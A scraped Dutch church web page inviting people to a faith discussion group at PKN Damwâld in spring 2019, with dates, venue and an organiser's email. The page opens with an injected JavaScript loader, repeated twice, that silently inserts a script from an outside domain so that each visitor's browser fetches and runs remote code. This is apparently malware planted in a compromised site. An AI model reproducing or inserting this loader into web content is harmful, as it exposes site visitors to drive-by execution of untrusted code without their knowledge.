;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); GROEIEN IN GELOOF - gespreksgroep - PKN Damwâld
20 maart 2019
20:00 t/m 21:00
de Ontmoeting
GROEIEN IN GELOOF – gespreksgroep

We kwamen een tijd geleden met zo’n 15 mensen bij elkaar om te praten en te leren over geloofsopvoeding. Dit was een mooie, open en inspirerende avond met mooie, eerlijke verhalen. Aan het eind van de avond kwamen we tot de conclusie dat we vaker bij elkaar willen komen. Ook hadden we ontdekt dat het allemaal begint met je eigen persoonlijke relatie met God en dat we daar in willen groeien. Samen meer leren en ontdekken uit de Bijbel en elkaars verhalen. Samen groeien, gevuld en geïnspireerd raken. ‘Waar je hart vol van is,…’ Dit is wat iemand uitsprak als verlangen, om meer gevuld te zijn met God, en daar hebben we ook elkaar bij nodig.

Daarom willen ik je uitnodigen voor de volgende avonden. Ook als je niet op de geloofsopvoeding thema-avond was, ben je van harte welkom. En je mag anderen meenemen natuurlijk!
De datums zijn: 20 maart, 17 april, 22 mei. We beginnen om 20.00 uur in de Ontmoeting.
Tot dan! Robert (robertcolijn@gmail.com)

Locatie: de OntmoetingFoarwei 38, 9104 BX Damwâld